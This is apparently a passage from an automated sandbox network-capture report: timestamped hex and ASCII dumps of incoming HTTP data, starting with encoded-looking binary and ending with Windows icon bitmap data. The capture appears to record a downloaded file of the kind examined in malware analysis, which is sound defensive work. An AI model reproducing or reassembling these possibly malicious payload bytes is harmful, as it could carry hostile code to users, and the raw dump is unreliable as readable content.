                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1722INData Raw: 02 72 59 41 66 47 74 78 64 66 72 77 79 75 65 71 49 1f 35 33 50 72 74 6d 60 55 66 75 15 65 6d 65 24 72 6f 68 65 2e db 00 72 5e 56 fe 32 74 72 65 43 64 05 da 77 65 01 c7 24 5a 79 5f 72 7e 78 8d 63 26 74 72 6f 1e 23 6c 72 65 51 42 41 53 2b 5a 72 41 73 4e 7e 74 72 f2 52 b7 79 75 65 42 6f 35 22 a2 7f da 74 6c 73 4b 43 73 64 f1 4d c9 6d 72 6f 4a 69 47 44 94 6d 44 73 74 63 63 e6 7b 79 43 7f 7f 63 f1 6e 6f cd 34 1c 48 58 74 77 43 60 63 89 72 65 6d 2f 6d 72 7e 07 64 41 53 04 0c 52 41 73 61 5c 5f 64 66 74 60 f4 22 65 71 64 16 23 44 36 7c 74 1c d1 72 0c 3a 72 65 67 1b 76 73 6f 7d 42 6c 44 26 0c 4e 40 73 61 8a 74 43 64 72 71 0a 32 64 71 6f 16 b5 2d 5e 72 70 44 54 65 63 5e 4b c6 6d 65 6d 5a 27 78 67 4b 2d 1c 73 54 45 56 48 63 54 1a 7c 73 77 7d 8b 63 59 67 33 33 45 16
                                                                                                                                                                                                          Data Ascii: rYAfGtxdfrwyueqI53Prtm`Ufueme$rohe.r^V2treCdwe$Zy_r~xc&tro#lreQBAS+ZrAsN~trRyueBo5"tlsKCsdMmroJiGDmDstcc{yCcno4HXtwC`crem/mr~dASRAsa\_dft`"eqd#D6|tr:regvso}BlD&N@satCdrq2dqo-^rpDTec^KmemZ'xgK-sTEVHcT|sw}cYg33E
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1730INData Raw: 5e 57 8d 67 5e 58 67 09 e0 76 79 7f 73 8f 67 19 1f 35 30 e1 75 6c 79 73 9d 77 58 4f 6e 0a f9 73 6f 73 71 bf 51 2a 5c 27 a4 72 65 72 f2 99 66 72 73 53 6b 67 59 00 33 35 3c 75 6c 77 44 15 65 63 7f 58 4b 1e 61 6f 72 69 f9 98 41 53 04 58 4a 43 5b 00 74 72 6e 4c 08 09 7c 75 65 75 1b 35 35 36 5b 5a 59 6c 73 63 11 2a 78 65 1d 73 72 62 47 ec 66 41 59 26 58 4a 43 5b 00 74 72 6e 4c 40 75 02 74 64 71 61 5c a3 37 5f 78 5e 5e 71 1e 62 74 72 61 02 f3 6c 72 65 53 79 43 7b 65 72 54 4b 59 57 76 09 60 67 72 73 16 e3 64 71 6f 19 07 34 24 76 75 6c 77 0a f5 74 72 6f 47 4b 1e 7f 6d 79 61 c1 54 01 72 50 6b 6d 67 5c 17 64 66 78 5d cb 76 72 fc 3c 33 35 37 7a 64 6b 10 ee 0a ff 75 72 6f 7b ff 6e 65 e2 20 67 41 52 25 64 4b 3d ee 0a e8 72 64 6c 65 ed 0a e2 64 71 6f 19 2b 35 77 14 74
                                                                                                                                                                                                          Data Ascii: ^Wg^Xgvysg50ulyswXOnsosqQ*\'rerfrsSkgY35<ulwDecXKaoriASXJC[trnL|ueu556[ZYlsc*xesrbGfAY&XJC[trnL@utdqa\7_x^^qbtralreSyC{erTKYWv`grsdqo4$vulwtroGKmyaTrPkmg\dfx]vr<357zdkuro{ne gAR%dK=rdledqo+5wt
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1738INData Raw: b8 0a 74 72 64 66 b4 77 18 44 df 64 42 32 e1 59 5f 72 74 6c b5 65 18 42 b6 70 44 64 c5 02 6f 79 67 41 c5 00 0c 6c a8 66 4c 75 c3 14 66 72 77 79 f3 7d c5 56 32 35 1f 5e ce 04 6c 73 65 63 b3 72 04 5c df 78 5b 6e 5d 16 41 53 00 72 92 41 08 52 b0 67 4f 67 2e 05 79 75 65 71 e3 2b 81 05 5e 72 5f 6d 17 17 63 75 72 65 ab 65 0c 43 d5 6c 4c 40 3f 72 72 54 41 73 a3 74 09 53 a2 67 5a 78 45 16 71 65 33 35 b0 47 c6 47 6d 73 48 62 4d 01 65 6d 65 6d b4 6f 18 56 fb 46 2d 73 14 32 73 65 74 72 a2 66 09 40 bd 60 4a 70 b9 40 35 36 5f 72 f2 74 c7 56 62 75 5d 64 89 16 6d 72 6f 79 e1 49 1f 29 1e 56 6e 72 89 07 72 64 66 72 f1 61 c1 56 61 65 1c 34 7a 2b 72 74 6c 73 e3 63 16 54 91 78 55 6c b6 1b 79 67 41 53 81 72 24 7e d5 68 46 73 24 1f 72 77 79 75 e3 71 a7 2c dd 36 6c 73 e8 16 73
                                                                                                                                                                                                          Data Ascii: trdfwDdB2Y_rtleBpDdoygAlfLufrwy}V25^lsecr\x[n]ASrARgOg.yueq+^r_mcureeClL@?rrTAstSgZxEqe35GGmsHbMememoVF-s2setrf@`Jp@56_rtVbu]dmroyI)VnrrdfraVae4z+rtlscTxUlygASr$~hFs$rwyuq,6lss
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1746INData Raw: eb 54 64 66 73 77 e6 53 65 71 64 33 aa 10 5f 72 75 6c ec 43 63 75 73 65 f2 43 6d 72 6e 79 f8 73 53 00 73 54 de 41 65 74 73 64 76 32 77 79 74 65 e3 5c 33 35 37 5f 25 41 6c 73 64 63 4a 44 65 6d 64 6d 13 59 79 67 40 53 35 44 54 41 72 65 a6 4b 64 66 73 77 11 4c 65 71 64 33 81 0f 5f 72 75 6c 7b 53 63 75 73 65 65 53 6d 72 6e 79 6f 77 53 00 73 54 9a 4a 65 74 73 64 6e 44 77 79 74 65 79 53 33 35 37 5f 7a 42 6c 73 64 63 7d 44 65 6d 64 6d ed 5d 79 67 40 53 9f 40 54 41 71 65 25 68 64 66 73 77 1e 54 65 71 64 33 aa 10 5f 72 75 6c ec 43 63 75 73 65 f2 43 6d 72 6e 79 f8 67 53 00 73 54 de 55 65 74 73 64 f9 54 77 79 74 65 ee 43 33 35 37 5f ed 52 6c 73 64 63 ea 54 65 6d 64 6d ed 49 79 67 40 53 9f 54 54 41 72 65 eb 54 64 66 73 77 e6 53 65 71 64 33 aa 10 5f 72 75 6c ec 43 63
                                                                                                                                                                                                          Data Ascii: TdfswSeqd3_rulCcuseCmrnysSsTAetsdv2wyte\357_%AlsdcJDemdmYyg@S5DTAreKdfswLeqd3_rul{ScuseeSmrnyowSsTJetsdnDwyteyS357_zBlsdc}Demdm]yg@S@TAqe%hdfswTeqd3_rulCcuseCmrnygSsTUetsdTwyteC357_RlsdcTemdmIyg@STTAreTdfswSeqd3_rulCc
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1754INData Raw: 61 67 5b 77 7b 75 63 70 4e 33 34 36 58 73 5f 6c 71 65 6b 74 5f 65 6c 65 64 73 42 79 65 41 59 01 5d 54 40 73 6e 75 5d 64 64 72 7b 78 44 65 70 65 3e 34 07 5f 70 74 62 72 56 63 74 72 6a 6c 56 6d 70 6f 69 66 74 53 01 72 45 40 46 65 76 72 77 67 45 77 78 75 71 70 52 33 37 36 4a 73 4d 6c 72 65 75 74 4b 65 6f 65 7a 73 54 79 66 41 4b 01 49 54 43 73 41 75 4f 64 67 72 52 78 48 65 73 65 15 34 09 5f 73 74 4b 72 5a 63 77 72 4d 6c 24 6d 73 6f 50 66 00 53 02 72 7e 40 30 65 75 72 4f 67 31 77 7b 75 48 70 20 33 34 36 71 73 31 6c 71 65 51 74 35 65 6c 65 5e 73 28 79 65 41 67 01 3b 54 40 73 50 75 3b 64 64 72 41 78 3e 65 70 65 04 34 7d 5f 70 74 55 72 28 63 74 72 5f 6c 28 6d 70 6f 42 66 0e 53 01 72 68 40 3c 65 76 72 59 67 23 77 78 75 5b 70 34 33 37 36 60 73 27 6c 72 65 23 74 21
                                                                                                                                                                                                          Data Ascii: ag[w{ucpN346Xs_lqekt_eledsByeAY]T@snu]ddr{xDepe>4_ptbrVctrjlVmpoiftSrE@FevrwgEwxuqpR376JsMlreutKeoezsTyfAKITCsAuOdgrRxHese4_stKrZcwrMl$msoPfSr~@0eurOg1w{uHp 346qs1lqeQt5ele^s(yeAg;T@sPu;ddrAx>epe4}_ptUr(ctr_l(mpoBfSrh@<evrYg#wxu[p4376`s'lre#t!
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1762INData Raw: 72 43 4c 4c 5d 40 57 77 04 0e 1d 47 44 2f 4b 20 56 33 4b 53 55 56 5c 37 29 3d 50 71 63 46 4b 62 73 35 53 4d 40 20 54 4b 32 79 42 54 34 51 01 02 05 69 4b 31 5c 44 54 5b 40 33 20 5d 51 5d 45 2a 4a 21 00 11 31 33 65 77 36 21 42 40 26 22 43 42 40 30 65 48 50 03 0c 0e 1c 36 32 55 41 5c 5b 42 40 23 54 27 5b 45 2a 4c 5f 71 64 30 36 64 79 4b 23 4c 40 57 5e 34 40 3a 34 27 34 65 70 70 07 67 30 44 58 44 54 53 42 33 24 5f 56 29 43 2e 38 5e 03 61 45 36 67 73 37 56 45 44 55 52 4a 32 49 47 53 44 50 75 35 02 1d 42 41 2f 36 27 27 42 36 52 5d 23 5c 44 5f 4e 23 75 64 34 31 15 04 42 52 42 34 21 27 37 35 4e 41 56 48 52 0a 00 70 5f 37 43 5c 46 26 55 46 46 50 2e 57 5b 33 29 41 55 04 65 34 36 66 73 37 27 31 46 50 24 40 36 4a 40 54 45 23 01 73 06 69 34 74 54 30 51 5a 33 45 5d 2c
                                                                                                                                                                                                          Data Ascii: rCLL]@WwGD/K V3KSUV\7)=PqcFKbs5SM@ TK2yBT4QiK1\DT[@3 ]Q]E*J!13ew6!B@&"CB@0eHP62UA\[B@#T'[E*L_qd06dyK#L@W^4@:4'4eppg0DXDTSB3$_V)C.8^aE6gs7VEDURJ2IGSDPu5BA/6''B6R]#\D_N#ud41BRB4!'75NAVHRp_7C\F&UFFP.W[3)AUe46fs7'1FP$@6J@TE#si4tT0QZ3E],
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1770INData Raw: 0d 10 08 5f 36 56 56 43 2d 1b 00 15 5d 26 11 0c 02 11 02 02 1f 13 1f 11 1e 6f 0b 35 42 6d 02 16 17 00 1b 02 0f 11 16 0d 10 16 71 37 56 59 53 3e 01 11 39 03 01 02 01 17 16 6d 36 19 00 06 09 36 34 3c 74 17 27 41 35 17 1b 1f 29 0f 1c 02 0d 10 16 71 3a 55 5c 5a 3a 30 0d 18 16 16 63 22 00 0c 19 00 2c 1e 03 3b 1e 35 36 73 72 17 2e 1d 13 11 00 10 32 1d 35 00 01 00 02 65 74 50 42 1d 0b 00 09 00 65 01 0c 06 00 1e 65 2a 17 1b 35 08 26 3a 63 13 38 05 01 0c 02 17 17 66 31 24 11 14 17 01 24 41 52 43 32 17 1a 18 3a 0b 05 1a 34 09 0c 02 1e 72 2c 2a 0f 20 21 70 30 3d 2f 17 00 06 34 08 07 15 04 79 11 12 37 09 52 52 45 5f 14 18 0d 14 16 63 16 1d 0b 0b 0c 0a 01 6f 0a 02 35 27 69 1c 33 32 73 22 11 06 37 05 13 19 38 07 02 02 65 52 47 51 2c 72 13 09 07 3a 33 14 01 16 08 01 3d
                                                                                                                                                                                                          Data Ascii: _6VVC-]&o5Bmq7VYS>9m664<t'A5)q:U\Z:0c",;56sr.25etPBee*5&:c8f1$$ARC2:4r,* !p0=/4y7RRE_co5'i32s"78eRGQ,r:3=
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1778INData Raw: 65 14 65 5e 35 53 5f 1c 74 18 73 0b 63 46 72 57 6d 3a 6d 36 6f 10 67 32 53 53 72 2d 41 00 65 00 72 01 66 1f 77 57 75 28 71 04 33 5b 36 3e 72 13 6c 16 65 0e 75 17 65 03 65 19 72 04 79 23 41 21 00 1b 54 37 73 36 74 0b 64 15 72 03 79 10 65 1c 65 1d 35 7b 5f 13 74 02 73 04 63 12 72 00 6d 08 6d 17 6f 17 67 35 53 65 72 54 62 20 65 0d 72 17 66 06 77 1c 75 08 71 4b 33 78 36 3e 72 1a 6c 12 65 04 75 17 65 00 65 08 72 01 79 13 41 53 19 21 54 24 73 17 74 1b 64 07 72 1b 79 3b 65 04 65 5e 35 54 5f 17 74 1e 73 65 e2 f2 21 65 28 65 21 72 3c 79 1e 41 20 00 06 54 24 73 08 74 5c 64 32 72 12 79 0d 65 05 65 1d 35 64 5f 17 74 0b 73 10 63 19 72 04 6d 17 6d 37 6f 01 67 31 53 72 72 31 41 00 65 07 72 0d 66 1d 77 17 75 16 71 20 33 76 36 0b 72 54 6c 59 65 43 75 34 65 3f 65 3e 72 16
                                                                                                                                                                                                          Data Ascii: ee^5S_tscFrWm:m6og2SSr-AerfwWu(q3[6>rleueery#A!T7s6tdryee5{_tscrmmog5SerTb erfwuqK3x6>rleueeryAS!T$stdry;ee^5T_tse!e(e!r<yA T$st\d2ryee5d_tscrmm7og1Srr1Aerfwuq 3v6rTlYeCu4e?e>r
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1786INData Raw: 2b 52 58 53 5c 3b 10 5f 7c 64 63 74 72 31 63 61 23 13 02 1c 64 08 37 34 7d 55 41 72 65 20 7c 60 28 13 1a 1c 76 2c 15 50 3c 34 36 5e 72 20 62 77 2b 02 18 17 66 24 01 5b 7d 6e 79 66 41 07 0e 76 1a 20 1e 00 77 3b 00 51 7d 76 79 74 65 25 6b 37 7b 57 32 17 77 25 17 5d 6c 74 72 64 6d 31 63 76 21 18 0a 24 50 49 16 6d 51 72 65 75 72 30 68 76 39 18 18 00 75 2c 57 04 06 4f 73 74 6d 73 31 6d 71 3c 04 00 00 69 3b 0b 48 56 51 52 00 73 54 15 7d 61 3a 13 09 03 76 3e 1d 44 57 61 64 33 34 36 0b 7c 70 22 12 08 06 71 3b 01 5c 56 7d 73 6f 78 67 15 5d 04 3c 35 2c 16 61 3d 16 55 52 62 76 79 74 65 25 6b 37 7b 57 32 17 70 25 17 54 56 65 73 65 6c 65 39 7c 6b 37 06 2c 36 04 3b 30 70 45 75 75 72 65 66 26 79 7d 3b 04 1c 00 37 7c 52 6e 45 64 6d 73 64 63 21 7c 61 23 04 00 17 6b 30 03
                                                                                                                                                                                                          Data Ascii: +RXS\;_|dctr1ca#d74}UAre |`(v,P<46^r bw+f$[}nyfAv w;Q}vyte%k7{W2w%]ltrdm1cv!$PImQreur0hv9u,WOstms1mq<i;HVQRsT}a:v>DWad346|p"q;\V}soxg]<5,a=URbvyte%k7{W2p%TVesele9|k7,6;0pEuuref&y};7|RnEdmsdc!|a#k0
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1794INData Raw: 60 36 0c 72 00 6c 01 65 0a 75 1c 65 0a 65 43 72 3d 79 02 41 23 00 1e 54 20 73 06 74 17 64 15 72 12 79 07 65 1f 65 52 35 5b 5f 17 74 30 73 38 63 5a 72 13 6d 04 6d 21 6f 0d 67 33 53 69 72 3a 41 14 65 5a 72 36 66 17 77 09 75 09 71 04 33 56 36 3a 72 18 6c 06 65 06 75 3e 65 02 65 0e 72 0e 79 0b 41 73 00 37 54 39 73 11 74 17 64 08 72 04 79 1c 65 1e 65 5d 35 16 5f 21 74 09 73 11 63 01 72 0c 6d 0b 6d 15 6f 0a 67 0f 53 57 72 3d 41 1d 65 1b 72 16 66 16 77 2f 75 32 71 0c 33 5b 36 2f 72 1a 6c 5d 65 06 75 25 65 04 65 03 72 17 79 02 41 79 00 25 54 28 73 0b 74 1a 64 09 72 04 79 01 65 1c 65 5c 35 4c 5f 2d 74 0f 73 0a 63 1a 72 0e 6d 0c 6d 17 6f 0a 67 41 53 55 72 27 41 16 65 06 72 44 66 36 77 18 75 11 71 04 33 35 36 5f 72 74 6c 04 65 0a 75 1c 65 09 65 02 72 18 79 14 41 7e
                                                                                                                                                                                                          Data Ascii: `6rleueeCr=yA#T stdryeeR5[_t0s8cZrmm!og3Sir:AeZr6fwuq3V6:rleu>eeryAs7T9stdryee]5_!tscrmmogSWr=Aerfw/u2q3[6/rl]eu%eeryAy%T(stdryee\5L_-tscrmmogASUr'AerDf6wuq356_rtleueeryA~
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1802INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 03 00 00 00 30 00 00 80 0e 00 00 00 c0 00 00 80 10 00 00 00 d8 00 00 80 18 00 00 00 f0 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 01 00 00 00 08 01 00 80 02 00 00 00 20 01 00 80 03 00 00 00 38 01 00 80 04 00 00 00 50 01 00 80 05 00 00 00 68 01 00 80 06 00 00 00 80 01 00 80 07 00 00 00 98 01 00 80 08 00 00 00 b0 01 00 80 09 00 00 00 c8 01 00 80 0a 00 00 00 e0 01 00 80 0b 00 00 00 f8 01 00 80 0c 00 00 00 10 02 00 80 0d 00 00 00 28 02 00 80 0e 00 00 00 40 02 00 80 0f 00 00 00 58 02 00 80 10 00 00 00 70 02 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 6b 00 00 00 88 02 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 a0 02 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01
                                                                                                                                                                                                          Data Ascii: 0 8Ph(@Xpk
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1810INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 00 01 00 00 80 00 00 00 00 01 00 00 80 00 00 00 00 01 00 00 c0 00 00 00 00 03 00 00 c0 00 00 00 00 03 00 00 e0 00 00 00 00 07 00 00 e0 00 00 00 00 07 00 00 f0 00 00 00 00 0f 00 00 f8 00 00 00 00 1f 00 00 f8 00 00 00 00 1f 00 00 fc 00 00 00 00 3f 00 00 fe 00 00 00 00 7f 00 00 ff 00 00 00 00 ff 00 00 ff c0 00 00 03 ff 00 00 ff e0 00 00 07 ff 00 00 ff f8 00 00 1f ff 00 00 ff fe 00 00 7f ff 00 00 ff ff c0 03 ff ff 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 08 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 00 91 6c 00 00 98 75 10 00 9f 7e 1f 00 a5 87 2f 00 ac 91 3f 00 b3 9a 4f 00 ba a3 5f 00 c1 ac 6f 00 c9 b5 7f
                                                                                                                                                                                                          Data Ascii: ?( @lu~/?O_o
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1818INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1826INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 40 ff ff ff 9f ff ff ff ff ff ff ff
                                                                                                                                                                                                          Data Ascii: @
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1834INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 ff ff ff bf ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff d6 c8 9e ff 9f 7e 1f ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00
                                                                                                                                                                                                          Data Ascii: 0~lllllllllll
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1842INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 ff ff ff cf ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff dd d1 ae ff 98 75 10 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00
                                                                                                                                                                                                          Data Ascii: 0ullllllllllllllllllllllll
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1850INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ba a3 5f ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00
                                                                                                                                                                                                          Data Ascii: _lllllllllllllllllllllllllllllllllll
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1858INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 9f ff ff ff ff ff ff ff ff ff ff ff ff f8 f6 ef ff 9f 7e 1f ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00
                                                                                                                                                                                                          Data Ascii: ~lllllllllllllllllllllllllllllllllllllllllll
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1866INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 50 ff ff ff ff ff ff ff ff ff ff ff ff f1 ed df ff 98 75 10 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00
                                                                                                                                                                                                          Data Ascii: Pullllllllllllllllllllllllllllllllllllllllllllllllll
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1874INData Raw: 00 00 00 00 00 00 00 00 ff ff ff 20 ff ff ff ef ff ff ff ff ff ff ff ff f1 ed df ff 98 75 10 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00
                                                                                                                                                                                                          Data Ascii: ullllllllllllllllllllllllllllllllllllllllllllllllllllllll
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1882INData Raw: ff ff ff ff f1 ed df ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 ff 91 6c 00 